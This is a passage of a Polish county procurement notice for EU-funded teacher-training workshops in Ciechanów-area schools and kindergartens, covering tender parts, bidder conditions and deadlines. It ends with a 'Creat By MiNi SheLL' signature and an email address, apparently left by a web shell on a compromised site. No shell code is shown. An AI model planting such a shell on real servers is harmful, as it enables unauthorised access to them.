w przedszkolach: Miejskim nr 10  w Ciechanowie, Miejskim nr 3 w Ciechanowie, Miejsko-Gm. w Glinojecku, 

po 12 h WS w dwóch modułach po 6 h oraz 5 h KG dla grupy od 8 do 25 osób 
wg  autorskiego programu osoby prowadzącej. 
Miejsce i czas realizacji: SP w Woli Młockiej XI 2013 r. - I 2014 r, SP  w Młocku I - II 2014 r, 

Miejskie Przedszk. nr 10 w Ciechanowie XI-XII 2013 r, Miejskie Przedszk. nr 3  w Ciechanowie XI 2013 r. 

- I 2014 r, M-G Przedszk. w Glinojecku XI-XII 2013 r. 
Tematyka WS i KG:
- komunikacja interpersonalna,  prowadzenie spotkań z rodzicami, radzenie sobie w sytuacjach 

stresowych, asertywnych,
- rozwiązywanie konfliktów,    
- formy integracji i komunikacji szkoły z rodzicami,
-  efektywne formy współpracy nauczycieli z rodzicami,
- aktywizacja rodziców w życie szkoły,
 - diagnozowanie potrzeb rodziców oraz metod wspierania rodziców w realizacji ich funkcji wychowawczej 

i opiekuńczej,
- wypracowanie narzędzi diagnozowania potrzeb rodziców.

 XVIII
Rodzice są partnerami szkoły.

W ramach oferty Wykonawca zobowiązany jest do:
- przeprowadzenia WS oraz  KG, obejmujących łącznie 80  h w:
w SP w: Kołaczkowie i  WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h dla grup od 8 do 25 osób
-w gimnazjach w: Glinojecku, Kraszewie, po 15 h, WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h 

dla grup od 8 do 25 osób
wg  autorskiego programu osoby prowadzącej.  
Miejsce i czas realizacji: SP w Kołaczkowie I-III 2014 r, SP w Kraszewie III-IV 2014 r, Gim. w XI-XII 

2013 r,  Gim. w Kraszewie XI 2013 r - I 2014 r.
Tematyka WS i KG:
- komunikacja interpersonalna,  prowadzenie spotkań z rodzicami, radzenie sobie w sytuacjach stresowych 

i asertywnych,
- rozwiązywanie konfliktów,    
- różnorodne formy integracji i komunikacji szkoły z rodzicami,
-  efektywne formy współpracy nauczycieli z rodzicami,    
- aktywizacja rodziców w życie szkoły,
 - diagnozowanie potrzeb rodziców oraz metod wspierania rodziców w realizacji ich funkcji wychowawczej 

i opiekuńczej,
- wypracowanie narzędzi diagnozowania potrzeb rodziców.

 XIX
Nauczyciel 45+.

 W ramach oferty Wykonawca zobowiązany jest do:
- przeprowadzenia WS oraz  konsultacji grupowych, obejmujących łącznie 20  h w:     
w SP w Regiminie WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h dla grupy 20 osób
wg  autorskiego programu osoby prowadzącej. 
Miejsce i czas realizacji:   SP w Regiminie XI-XII 2013 r.

Tematyka WS i KG:
- emisja głosu, choroby zawodowe,
- wykorzystanie TIK w pracy dydaktycznej, zgodnie z rozporządzeniem MEN z dnia 23 XII 2008 r. (Dz. U z  

2009 r. Nr 4, poz. 17),
-  komunikacja interpersonalna, radzenie sobie ze stresem, profilaktyka wypalenia zawodowego.

 XX
Przedszkole promuje wartość edukacji.

 W ramach oferty doskonalenia Wykonawca zobowiązany jest do:
- przeprowadzenia WS oraz  KG, obejmujących łącznie 17  h w:
w Przedszkolu nr 6 w Ciechanowie w wymiarze 12 h WS w dwóch modułach po 6 h oraz 5 h KG dla grupy 11 

osób
wg  autorskiego programu osoby prowadzącej. 
Miejsce i czas realizacji:  Przedszk. nr 6 w Ciechanowie II-V 2014 r.

Tematyka WS i KG:
-   różnorodne formy promowania przedszkola,
- uwzględnianie potrzeb środowiska w zakresie proponowanej oferty edukacyjnej,
- planowanie promocji edukacji we współpracy z rodzicami i środowiskiem lokalnym,
- opracowanie narzędzi do ewaluacji działań przedszkola.

 XXI
Efektywna organizacja pracy zespołów nauczycielskich.

 W ramach oferty Wykonawca zobowiązany jest do:
- przeprowadzenia WS oraz  KG, obejmujących łącznie 77  h w:
Gimnazjum w Regiminie,  WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h dla grupy 10 osób
technikach: nr 2 w Ciechanowie, nr 1 w Ciechanowie, WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 

h dla grup od 8 do 25 osób
Przedszkolu nr 6 w Ciechanowie w wymiarze 12 h WS w dwóch modułach po 6 h oraz 5 h KG dla grupy 11 osób
wg  autorskiego programu osoby prowadzącej. 
Miejsce i czas realizacji:   Gim. w Regiminie II-III 2014 r, Tech. nr 2 w Ciechanowie XI-XII 2013 r, 

Tech.  nr 1 w Ciechanowie XI 2013 r. - II 2014 r,  Przedszk. nr 6  w Ciechanowie XI 2013 r. -  I 2014r.
Tematyka WS:
- komunikacja interpersonalna, motywacja wewnętrzna, rozwiązywanie konfliktów,
- kształtowanie pozytywnych i bezpiecznych relacji wśród pracowników,
- zasady powoływania zespołów zadaniowych,
- kształtowanie pozytywnych i bezpiecznych relacji (budowanie zespołu), radzenie sobie ze stresem,
- inicjowanie i wspieranie działań opartych na zaufaniu, udzielaniu wsparcia, wymianie doświadczeń, 

planowaniu i organizacji pracy w zespołach.
- wypracowanie zasad powoływania zespołów oraz przydziału zadań. Pomoc  w określeniu zadań dla każdego 

zespołu i w planowaniu działań.
- budowanie zespołu, radzenie sobie ze stresem, praca metodą projektu,
- opracowanie regulaminu nagradzania nauczycieli. 
KG oprócz tematyki przewidzianej dla warsztatów obejmują:  
-opracowanie programu integrującego nauczycieli.

 XXII
Współpraca nauczycieli w prowadzeniu procesów edukacyjnych.

W ramach oferty Wykonawca zobowiązany jest do:
- przeprowadzenia WS oraz  KG, obejmujących łącznie 80  h w:
w SP w: Młocku, nr 5 w Ciechanowie, po  15 h, w trzech modułach po 5 h oraz  po 5 h KG dla grup od 8 do 

25 osób
gimnazjach w: Gąsocinie, Glinojecku po 15 h w trzech modułach po 5 h oraz  po 5 h KG dla grup od 8 do 25 osób wg  autorskiego programu osoby prowadzącej.
Miejsce i czas realizacji: SP w Młocku XI-XII 2013 r, SP nr 5 w Ciechanowie I-III 2014 r,  Gim. w Gąsocinie II-III 2014 r, Gim. w Glinojecku I-II 2014.
Tematyka WS:
- analiza wyników sprawdzianów zewnętrznych i planowanie działań na podstawie sformułowanych wniosków,
-komunikacja interpersonalna, motywacja wewnętrzna, rozwiązywanie konfliktów,
- udzielanie informacji zwrotnej,
- praca zespołowa, w tym zespołowe planowanie działań.
KG  oprócz tematyki przewidzianej dla WS obejmują trafne planowanie działań na podstawie sformułowanych wniosków, realizacja których pozwoli na wzrost efektów kształcenia, zgodnie z zakresem tematycznym szkoleń.
XXIII
Jak i po co prowadzić ewaluację wewnętrzną ?

W ramach oferty Wykonawca zobowiązany jest do:
- przeprowadzenia WS oraz  KG, obejmujących łącznie 97  h w:
w SP w: Gąsocinie  i w Sońsku  WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h dla grup od 8 do 25 osób Gimnazjum w Sońsku WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h dla grup od 8 do 25 osób
Technikum nr 4 w Ciechanowie WS po 15h,  w trzech modułach po 5 h oraz  KG po  5 h dla grupy od 8 do 25 osób,
Gm. Przedszkolu w Gołotczyźnie, 12 h WS w dwóch modułach po 6 h oraz 5 h KG dla grupy od 8 do 25 osób
wg  autorskiego programu osoby prowadzącej.
Miejsce i czas realizacji:  SP w Gąsocinie XI 2013 r.  - I 2014 r, SP w Sońsku XI-XII 2013 r,  Gim.  w Sońsku XI-XII 2013 r, Tech.  nr 4 w Ciechanowie XI-XII 2013 r,  Gm. Przedszk. w Gołotczyźnie XI-XII 2013,
Tematyka WS:
- celowość prowadzenia ewaluacji wewn.,
- sposoby prowadzenia ewaluacji (narzędzia),
- przygotowanie projektu ewaluacji wewn.
KG oprócz tematyki przewidzianej dla WS obejmują opracowanie i realizację projektu ewaluacji wewn. w szkole.
W ramach każdej z ofert Wykonawca dodatkowo zobowiązany jest do:
1) opracowania i przeprowadzenia testu kompetencji na wejściu i wyjściu dla każdej szkoły,przedszkola,
2) opracowania we współpracy z Szkolnym Organizatorem Rozwoju Edukacji (w SIWZ jako SORE)harmonogramu: terminy (daty, godz.) i szczegółowej tematyki w rozbiciu na planowane godz.zajęć w ramach 
WS i KG i ich scenariuszy  uwzględniających  indywidualne potrzeby szkół,przedszkoli i przekazania ich Zamawiającemu na co najmniej 3 dni przed ich rozpoczęciem w szkole lub przedszkolu,
3) prowadzenia dziennika  zajęć i  przekazania SORE uzupełnionego dziennika zajęć po zakończonych warsztatach i konsultacjach. 
Zamawiający zapewnia wyżywienie dla uczestników szkoleń.  Sprzęt i wszelkie pomoce konieczne do realizacji zadania zapewnia Wykonawca. Sale i pracownie na realizację WS KG Zamawiający udostępnia nieodpłatnie. WS i KG prowadzone są na terenie szkół i przedszkoli..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 80.51.10.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 23.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na podstawie przedłożonych dokumentów i oświadczeń dokona oceny spełniania warunków określonych w art. 22 ust. 1 pzp metodą spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na podstawie przedłożonych dokumentów i oświadczeń dokona oceny spełniania warunków określonych w art. 22 ust. 1 pzp metodą spełnia- nie spełnia. Zamawiający uzna ten warunek za spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie wykonał (świadczył, realizował, zakończył) lub wykonuje (świadczy, realizuje) co najmniej jedną usługę tożsamą z przedmiotem zamówienia, polegającą na realizacji co najmniej 50 godz. usług szkoleniowych (1 godz. lekcyjna = 45 min) dla nauczycieli, dyrektorów szkół, rad pedagogicznych w obszarze edukacji na każdą część  zamówienia, na którą składa ofertę. Przykładowo - jeśli wykonawca składa ofertę na trzy dowolnie wybrane  części zamówienia winien wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie wykonał (świadczył, realizował, zakończył) lub wykonuje (świadczy, realizuje) co najmniej jedną usługę tożsamą z przedmiotem zamówienia, polegającą na realizacji łącznie 150 godz. usług szkoleniowych (1 godz. lekcyjna = 45 min) dla nauczycieli, dyrektorów szkół, rad pedagogicznych w obszarze edukacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na podstawie przedłożonych dokumentów i oświadczeń dokona oceny spełniania warunków określonych w art. 22 ust. 1 pzp metodą spełnia- nie spełnia. Zamawiający uzna ww. warunek za spełniony jeżeli wykonawca złoży oświadczenie zgodnie z załącznikiem nr 3 do SIWZ oraz wykaże, że dysponuje przynajmniej jedną osobą na każde rozpoczęte 150 h ofert doskonalenia (części od I do XXIII) (np. 1-150 godz. - 1 osoba, 151-300 godz. - 2 osoby) , na które składa ofertę:
1)o wyższym wykształceniu magisterskim, 
2)z przygotowaniem pedagogicznym, 
3)posiadającą co najmniej  5-letni łączny staż  pracy  placówkach oświatowych i/lub ośrodkach doskonalenia i/lub firmach szkoleniowych działających w obszarze edukacji,
4)doświadczenie w prowadzeniu szkoleń dla osób dorosłych w wymiarze co najmniej 50 h dla nauczycieli, dyrektorów szkół, rad pedagogicznych w ciągu ostatnich 3 lat przed terminem składania ofert,
a w odniesieniu do części nr XIV - że dysponuje jedną osobą, która oprócz  spełniania warunków wymienionych w pkt 4.1.3.1) do 4)  z wykształceniem wyższym lub podyplomowym o kierunku informatycznym.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://stciechanow.bip.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Ciechanowie, ul. 17 Stycznia 7, 06-400 Ciechanów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.11.2013 godzina 12:00, miejsce: Starostwo Powiatowe w Ciechanowie, ul. 17 Stycznia 7, 06-400 Ciechanów pok. 108.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest finansowane ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com